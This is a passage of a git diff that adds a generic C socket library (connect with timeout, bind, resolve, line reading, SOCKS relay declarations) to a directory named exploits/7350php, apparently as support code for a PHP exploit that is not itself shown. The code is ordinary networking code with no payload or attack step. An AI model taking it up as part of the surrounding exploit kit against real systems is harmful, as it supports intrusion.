433 ifi->ifi_name[IFI_NAME - 1] = '\0';
434
435#ifdef DEBUG
436 printf("got: %s\n", ifi->ifi_name);
437#endif
438
439 switch (ifr->ifr_addr.sa_family) {
440 case AF_INET:
441 sinptr = (struct sockaddr_in *) &ifr->ifr_addr;
442 memcpy(&ifi->ifi_saddr, &sinptr->sin_addr, sizeof(struct in_addr));
443 if (ifi->ifi_addr == NULL) {
444 ifi->ifi_addr = calloc(1, sizeof(struct sockaddr_in));
445 if (ifi->ifi_addr == NULL)
446 return (NULL);
447 memcpy(ifi->ifi_addr, sinptr, sizeof(struct sockaddr_in));
448 }
449 break;
450 default:
451 break;
452 }
453 }
454 free (buf);
455 return (ifihead);
456}
457
458
459void
460net_boundfree (bound *bf)
461{
462 close (bf->bs);
463 free (bf);
464 return;
465}
466
467
468bound *
469net_bind (char *ip, unsigned short int port)
470{
471 bound *b;
472 int br, gsnr, lr;
473 int len, reusetmp;
474 struct sockaddr_in *sap;
475
476 if (port >= 65536)
477 return (NULL);
478
479 b = calloc(1, sizeof (bound));
480 if (b == NULL)
481 return (NULL);
482 b->bs = socket (AF_INET, SOCK_STREAM, 0);
483 if (b->bs == -1)
484 goto berror;
485
486 reusetmp = 1;
487#ifdef SO_REUSEPORT
488 if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEPORT, &reusetmp, sizeof (reusetmp)) == -1)
489 goto berror;
490#else
491 if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEADDR, &reusetmp, sizeof (reusetmp)) == -1)
492 goto berror;
493#endif
494
495 sap = (struct sockaddr_in *) &b->bsa;
496 sap->sin_family = AF_INET;
497 sap->sin_port = htons (port); /* 0 = ephemeral */
498
499 if (ip != NULL) {
500 if (strcmp (ip, "*") == 0) {
501 sap->sin_addr.s_addr = htonl (INADDR_ANY);
502 } else {
503 if (!(sap->sin_addr.s_addr = net_resolve (ip))) {
504 goto berror;
505 }
506 }
507 } else {
508 sap->sin_addr.s_addr = htonl (INADDR_ANY);
509 }
510
511 br = bind (b->bs, (struct sockaddr *) &b->bsa, sizeof (struct sockaddr));
512 if (br == -1)
513 goto berror;
514
515 len = sizeof (struct sockaddr);
516 gsnr = getsockname (b->bs, (struct sockaddr *) &b->bsa, &len);
517 b->port = ntohs (sap->sin_port);
518 if (gsnr == -1)
519 goto berror;
520
521 lr = listen (b->bs, 16);
522 if (lr == -1) {
523 goto berror;
524 }
525 return (b);
526
527berror:
528 free (b);
529
530 return(NULL);
531}
532
533
534unsigned long int
535net_resolve (char *host)
536{
537 long i;
538 struct hostent *he;
539
540 i = inet_addr(host);
541 if (i == -1) {
542 he = gethostbyname(host);
543 if (he == NULL) {
544 return (0);
545 } else {
546 return (*(unsigned long *) he->h_addr);
547 }
548 }
549 return (i);
550}
551
552
553int
554net_assignaddr (int sd, char *sourceip, unsigned short int sourceport)
555{
556 struct sockaddr_in sourcedef;
557
558 if (sourceip && strcmp (sourceip, "*") == 0)
559 sourceip = NULL;
560
561 if (sourceip == NULL && sourceport == 0)
562 return (1);
563
564 /* is the IP available on the local host ? (not really necessary) */
565 if (sourceip && !net_testvip (sourceip)) {
566 return (0);
567 }
568
569 memset (&sourcedef, '\0', sizeof (struct sockaddr_in));
570
571 /* if sourceip is specified, set it */
572 if (sourceip) {
573 sourcedef.sin_addr.s_addr = net_resolve (sourceip);
574 } else {
575 sourcedef.sin_addr.s_addr = htonl (INADDR_ANY);
576 }
577 if (sourceport)
578 sourcedef.sin_port = htons (sourceport);
579
580 /* now set the source on the socket by binding it */
581 if (bind (sd, (struct sockaddr *) &sourcedef, sizeof (struct sockaddr_in)) == -1) {
582 return (0);
583 }
584
585 return (1);
586}
587
588
589int
590net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
591 unsigned short int sourceport, int sec)
592{
593 int n,
594 len,
595 error,
596 flags;
597 int fd;
598 struct timeval tv;
599 fd_set rset, wset;
600 struct sockaddr_in csa;
601
602 if (cs == NULL)
603 cs = &csa;
604
605 /* first allocate a socket */
606 cs->sin_family = AF_INET;
607 cs->sin_port = htons (port);
608 fd = socket (cs->sin_family, SOCK_STREAM, 0);
609 if (fd == -1)
610 return (-1);
611
612 /* check wether we should change the defaults */
613 if (net_assignaddr (fd, sourceip, sourceport) == 0) {
614 close (fd);
615 return (-1);
616 }
617
618 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
619 close (fd);
620 return (-1);
621 }
622
623 flags = fcntl (fd, F_GETFL, 0);
624 if (flags == -1) {
625 close (fd);
626 return (-1);
627 }
628 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
629 if (n == -1) {
630 close (fd);
631 return (-1);
632 }
633
634 error = 0;
635
636 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
637 if (n < 0) {
638 if (errno != EINPROGRESS) {
639 close (fd);
640 return (-1);
641 }
642 }
643 if (n == 0)
644 goto done;
645
646 FD_ZERO(&rset);
647 FD_ZERO(&wset);
648 FD_SET(fd, &rset);
649 FD_SET(fd, &wset);
650 tv.tv_sec = sec;
651 tv.tv_usec = 0;
652
653 n = select(fd + 1, &rset, &wset, NULL, &tv);
654 if (n == 0) {
655 close(fd);
656 errno = ETIMEDOUT;
657 return (-1);
658 }
659 if (n == -1)
660 return (-1);
661
662 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
663 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
664 len = sizeof(error);
665 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
666 errno = ETIMEDOUT;
667 return (-1);
668 }
669 if (error == 0) {
670 goto done;
671 } else {
672 errno = error;
673 return (-1);
674 }
675 }
676 } else
677 return (-1);
678
679done:
680 n = fcntl(fd, F_SETFL, flags);
681 if (n == -1)
682 return (-1);
683 return (fd);
684}
685
686
687int
688net_tline (char *buf, int bufsize)
689{
690 int p;
691
692 for (p = 0; p < bufsize; p++) {
693 if (buf[p] == '\n')
694 return (p + 1);
695 }
696 return (-1);
697}
698
699#define LINET_A 1024
700
701
702int
703net_rlineta (int fd, char **buf, int sec)
704{
705 int n; /* return value */
706 int bufsize = 0;
707
708 *buf = NULL;
709
710 do {
711 bufsize += LINET_A;
712 *buf = realloc (*buf, bufsize);
713 if (*buf == NULL)
714 return (-1);
715
716 n = net_rlinet (fd, *buf + bufsize - LINET_A, LINET_A, sec);
717
718 if (n == -1)
719 goto rlinetaerr;
720 if (n >= 0)
721 goto rlinetastrip;
722 } while (n == -2);
723
724rlinetastrip:
725 *buf = realloc (*buf, strlen (*buf) + 1);
726 return (strlen (*buf));
727
728rlinetaerr:
729 free (*buf);
730 return (-1);
731}
732
733
734int
735net_rlinet (int fd, char *buf, int bufsize, int sec)
736{
737 int n;
738 unsigned long int rb = 0;
739 struct timeval tv_start, tv_cur;
740
741 memset(buf, '\0', bufsize);
742 (void) gettimeofday(&tv_start, NULL);
743
744 do {
745 (void) gettimeofday(&tv_cur, NULL);
746 if (sec > 0) {
747 if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
748 ((tv_start.tv_sec * 1000000) + (tv_start.tv_usec))) > (sec * 1000000)) {
749 return (-1);
750 }
751 }
752 n = net_rtimeout(fd, net_readtimeout);
753 if (n <= 0) {
754 return (-1);
755 }
756 n = read(fd, buf, 1);
757 if (n <= 0) {
758 return (n);
759 }
760 rb++;
761 if (*buf == '\n')
762 return (rb);
763 buf++;
764 if (rb >= bufsize)
765 return (-2); /* buffer full */
766 } while (1);
767}
768
769
770long int
771net_rbuf (int fd, char **dst)
772{
773 long int ml = 0;
774 long int read_bytes;
775 int p;
776
777 *dst = NULL;
778
779 while ((p = net_rtimeout(fd, net_readtimeout)) == 1) {
780 *dst = (char *) realloc(*dst, ml + NET_BSIZE);
781 if (*dst == NULL)
782 return (-1);
783 ml += read_bytes = read(fd, *dst + ml, NET_BSIZE);
784 if (read_bytes == 0) {
785 *dst = (char *) realloc(*dst, ml);
786 if ((*dst == NULL) && (ml == 0)) {
787 return (1);
788 } else if (*dst == NULL) {
789 return (-1);
790 } else {
791 return (ml);
792 }
793 }
794 }
795 return (-1);
796}
797
798
799int
800net_rbuft (int fd, char *dst, unsigned long int dsize)
801{
802 unsigned long int bl = 0, m;
803 int p;
804
805 while (bl < dsize) {
806 p = net_rtimeout(fd, net_readtimeout);
807 if ((p == 0) || (p == -1)) {
808 return (-1);
809 }
810
811 m = read(fd, dst + bl, (dsize - bl));
812 if ((m == 0) || (m == -1)) {
813 return (-1);
814 }
815 bl += m;
816 }
817 return (1);
818}
819
820
821int
822net_rtimeout (int fd, int sec)
823{
824 fd_set rset;
825 struct timeval tv;
826 int n, error, flags;
827
828 error = 0;
829 flags = fcntl(fd, F_GETFL, 0);
830 n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
831 if (n == -1)
832 return (-1);
833
834 FD_ZERO(&rset);
835 FD_SET(fd, &rset);
836 tv.tv_sec = sec;
837 tv.tv_usec = 0;
838
839 /* now we wait until more data is received then the tcp low level watermark,
840 * which should be setted to 1 in this case (1 is default)
841 */
842
843 n = select(fd + 1, &rset, NULL, NULL, &tv);
844 if (n == 0) {
845 n = fcntl(fd, F_SETFL, flags);
846 if (n == -1)
847 return (-1);
848 errno = ETIMEDOUT;
849 return (-1);
850 }
851 if (n == -1) {
852 return (-1);
853 }
854 /* socket readable ? */
855 if (FD_ISSET(fd, &rset)) {
856 n = fcntl(fd, F_SETFL, flags);
857 if (n == -1)
858 return (-1);
859 return (1);
860 } else {
861 n = fcntl(fd, F_SETFL, flags);
862 if (n == -1)
863 return (-1);
864 errno = ETIMEDOUT;
865 return (-1);
866 }
867}
868
869
870void
871net_write (int fd, const char *str, ...)
872{
873 char tmp[1025];
874 va_list vl;
875 int i;
876
877 va_start(vl, str);
878 memset(tmp, 0, sizeof(tmp));
879 i = vsnprintf(tmp, sizeof(tmp), str, vl);
880 va_end(vl);
881
882#ifdef DEBUG
883 printf("[snd] %s\n", tmp);
884#endif
885
886 send(fd, tmp, i, 0);
887 return;
888}
889
890
891int
892net_printip (struct in_addr *ia, char *str, size_t len)
893{
894 unsigned char *ipp;
895
896 ipp = (unsigned char *) &ia->s_addr;
897 snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
898
899 return (0);
900}
901
902
903int
904net_printipa (struct in_addr *ia, char **str)
905{
906 unsigned char *ipp;
907
908 ipp = (unsigned char *) &ia->s_addr;
909 *str = calloc (1, 256);
910 if (*str == NULL)
911 return (1);
912
913 snprintf (*str, 255, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
914 *str = realloc (*str, strlen (*str) + 1);
915
916 return ((*str == NULL) ? 1 : 0);
917}
918
diff --git a/exploits/7350php/network.h b/exploits/7350php/network.h
new file mode 100644
index 0000000..3e726d0
--- /dev/null
+++ b/exploits/7350php/network.h
@@ -0,0 +1,367 @@
1/* scut's leet network library ;)
2 * 1999 (c) scut
3 *
4 * networking code
5 */
6
7#ifndef SCUT_NETWORK_H
8#define SCUT_NETWORK_H
9
10#include <sys/socket.h>
11#include <net/if.h>
12#include <netinet/in.h>
13#include <stdio.h>
14
15#define NET_READTIMEOUT 180
16#define NET_CONNTIMEOUT 60
17#define NET_IDENTTIMEOUT 15
18
19#define IFI_NAME 16
20#define IFI_HADDR 8
21
22/* struct ifi_info
23 *
24 * a linked list giving information about all the network interfaces available
25 * a pointer to this struct list is returned by net_get_ifi.
26 */
27
28struct ifi_info {
29 char ifi_name[IFI_NAME];
30 u_char ifi_haddr[IFI_HADDR];
31 u_short ifi_hlen;
32 short ifi_flags;
33 short ifi_myflags;
34 struct sockaddr *ifi_addr;
35 struct in_addr ifi_saddr;
36 struct ifi_info *ifi_next;
37};
38
39#define IFI_ALIAS 1
40
41typedef struct bound {
42 int bs; /* bound socket */
43 unsigned short port; /* port we bound to */
44 struct sockaddr bsa; /* bs_in */
45} bound;
46
47extern int net_readtimeout;
48extern int net_conntimeout;
49extern int net_identtimeout;
50
51
52/* net_socks_connect
53 *
54 * relays through an open socks 5 server (NO AUTH type)
55 * returns a socket descriptor which is already connected
56 */
57
58int net_socks_connect (char *socks, unsigned short int sport,
59 char *server, unsigned short int port, int sec);
60
61
62/* net_socks_put_s5info
63 *
64 * insert socks 5 compatible relay information into socket s5s,
65 * used to relay over more then just one socks server
66 */
67
68int net_socks_put_s5info (int s5s, char *server,
69 unsigned short int port, int sec);
70
71
72/* net_parseip
73 *
74 * read an ip in the format "1.1.1.1:299" or "blabla:481" into
75 * the char pointer *ip and into the port *port
76 *
77 * return 0 on failure
78 * return 1 on success
79 */
80
81int net_parseip (char *inp, char **ip, unsigned short int *port);
82
83
84/* net_getlocalip
85 *
86 * give back the main IP of the local machine
87 *
88 * return the local IP address as string on success
89 * return NULL on failure
90 */
91
92char *net_getlocalip (void);
93
94
95/* net_peeraddress
96 *
97 * return a pointer to a string representation of the remote IP address of
98 * the already connected socket `socket'
99 *
100 * return NULL on failure
101 * return string pointer on succes
102 */
103
104char * net_peeraddress (int socket);
105
106
107/* net_addrpair
108 *
109 * find address pair of an established TCP connection of socket `socket'.
110 *
111 * return 0 on success
112 * return 1 on failure
113 */
114
115int
116net_addrpair (int socket, struct in_addr *src_ip, unsigned short int *src_prt,
117 struct in_addr *dst_ip, unsigned short int *dst_prt);
118
119
120/* net_peername
121 *
122 * return a pointer that points to an alloced character array that contains
123 * the fully qualified hostname for the remote host that is connected using
124 * the socket descriptor `socket'.
125 +
126 * return NULL on failure
127 * return pointer to hostname or quad-dotted IP address
128 */
129
130char *net_peername (int socket);
131
132
133/* net_descriptify
134 *
135 * descriptify a socket `socket' ;)
136 *
137 * return -1 on failure
138 * return file descriptor on success
139 */
140
141FILE *net_descriptify (int socket);
142
143
144/* net_ident
145 *
146 * ident a connection identified by the host:port pairs on both sides,
147 * returning the ident in *ident
148 *
149 * return 1 on success
150 * return -1 on failure
151 */
152
153int net_ident (char **ident, struct sockaddr_in *locals, unsigned short int localport,
154 struct sockaddr_in *remotes, unsigned short int remoteport);
155
156
157/* net_accept
158 *
159 * accept a connection from socket s, and stores the connection
160 * into cs.
161 * wait a maximum amount of maxsec seconds for connections
162 * maxsec can also be zero (infinite wait, until connection)
163 *
164 * return 0 if no connection has been made within maxsec seconds
165 * return -1 if an error appears
166 * return the socket number if a connection has been made
167 */
168
169int net_accept (int s, struct sockaddr_in *cs, int maxsec);
170
171
172/* net_get_ifi
173 *
174 * get network interface information
175 *
176 * return NULL on failure
177 * return a pointer to a linked list structure ifi_info (see above)
178 */
179
180struct ifi_info *net_ifi_get (int family, int doaliases);
181
182
183/* net_ifi_free
184 *
185 * free the linked list associated with `tf'.
186 *
187 * return in any case
188 */
189
190void net_ifi_free (struct ifi_info *tf);
191
192
193/* net_testvip
194 *
195 * test if virtual ip/hostname is available for use on the local machine,
196 *
197 * return 1 if the ip can be used
198 * return 0 if the ip/host is not available
199 */
200
201int net_testvip (char *ip);
202
203
204/* net_bind
205 *
206 * bind a socket to an ip:port on the local machine,
207 * `ip' can be either NULL (bind to all IP's on the host), or a pointer
208 * to a virtual host name, or a real IP, or "*" for any.
209 * `port' can be either 0 (ephemeral port), or any free port.
210 *
211 * return NULL on failure
212 * return pointer to bound structure on success
213 */
214
215bound *net_bind (char *ip, unsigned short int port);
216
217
218/* net_boundfree
219 *
220 * free the bound structure pointed to by `bf'
221 *
222 * return in any case
223 */
224
225void net_boundfree (bound *bf);
226
227
228/* net_resolve
229 *
230 * resolve a hostname pointed to by `host' into a s_addr return value
231 *
232 * return the correct formatted `s_addr' for this host on success
233 * return 0 on failure
234 */
235
236unsigned long int net_resolve (char *host);
237
238
239/* net_assignaddr
240 *
241 * assign an IP address and port to a socket
242 * sourceip can be an IP or hostname that is available on the local host,
243 * or NULL/"*" to let the kernel choose one, same applies to sourceport,
244 * it can either be zero (ephemeral port choosen by the kernel) or a
245 * valid port number
246 *
247 * return 1 on success
248 * return 0 on failure
249 */
250
251int net_assignaddr (int sd, char *sourceip, unsigned short int sourceport);
252
253
254/* net_connect
255 *
256 * connect to the given `server' and `port' with a max timeout of `sec'.
257 * initialize the sockaddr_in struct `cs' correctly (ipv4), accept any
258 * ip "123.123.123.123" or hostname "localhost", "www.yahoo.de" as hostname.
259 * create a new socket and return either -1 if failed or
260 * the connected socket if connection has been established within the
261 * timeout limit.
262 *
263 * the routine is still IPv4 biased :-/
264 * with `sourceip'/`sourceportÄ you MAY specify the source IP and source port
265 * to use for the connection, but you can set the ip or port to NULL/0,
266 * to choose the default IP and an ephemeral port. this was added later in
267 * this library, so please update your sources.
268 *
269 * return -1 on failure
270 * return socket if success
271 */
272
273int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
274 unsigned short int sourceport, int sec);
275
276
277/* net_rtimeout
278 *
279 * waits max `sec' seconds for fd to become readable
280 *
281 * return -1 on error (errno set)
282 * return 1 on readability
283 */
284
285int net_rtimeout (int fd, int sec);
286
287
288/* net_rbuf
289 *
290 * allocate memory and read socket data to `dst' until the connection
291 * gets closed.
292 *
293 * return n if success (n = number of bytes read)
294 * return -1 if failed
295 */
296
297long int net_rbuf (int fd, char **dst);
298#define NET_BSIZE 4096 /* blocksize for pre-allocation */
299
300
301/* net_rbuft
302 *
303 * read `dsize' bytes into `dst' from `fd', with timeout
304 *
305 * return 1 on success
306 * return -1 on failure
307 */
308int net_rbuft (int fd, char *dst, unsigned long int dsize);
309
310
311/* net_rlinet
312 *
313 * read a line from socket descriptor with timeout to buffer
314 * if sec = 0, then only a continuous stream of data is required, not
315 * an overall timeout.
316 *
317 * return -1 on timeout
318 * return 0 on connection close
319 * return length of readen line (including '\n')
320 *
321 * net_rlineta
322 * same as net_rlinet, but allocs the memory itself
323 */
324
325int net_rlineta (int fd, char **buf, int sec);
326int net_rlinet (int fd, char *buf, int bufsize, int sec);
327
328
329/* net_tline
330 *
331 * return length if string `buf' with a maximum length of `bufsize'
332 * contains '\n'
333 *
334 * return -1 if no '\n' in string
335 */
336
337int net_tline (char *buf, int bufsize);
338
339
340/* net_write
341 *
342 * print a formatted string to a socket, see syntax of printf
343 *
344 * return in any case
345 */
346
347void net_write (int fd, const char *str, ...);
348
349
350/* net_printip
351 *
352 * print an IP address stored in the struct in_addr pointed to by `ia' to a
353 * string `str' with a maximum length of `len'.
354 *
355 * return 0 on success
356 * return 1 on failure
357 *
358 * net_printipa behaves the same way, except it allocates memory and let
359 * `*str' point to the string
360 */
361
362int net_printip (struct in_addr *ia, char *str, size_t len);
363int net_printipa (struct in_addr *ia, char **str);
364
365
366#endif
367
diff --git a/exploits/7350php/network.o b/exploits/7350php/network.o
new file mode 100644
index 0000000..cbe248a
--- /dev/null
+++ b/exploits/7350php/network.o
Binary files differ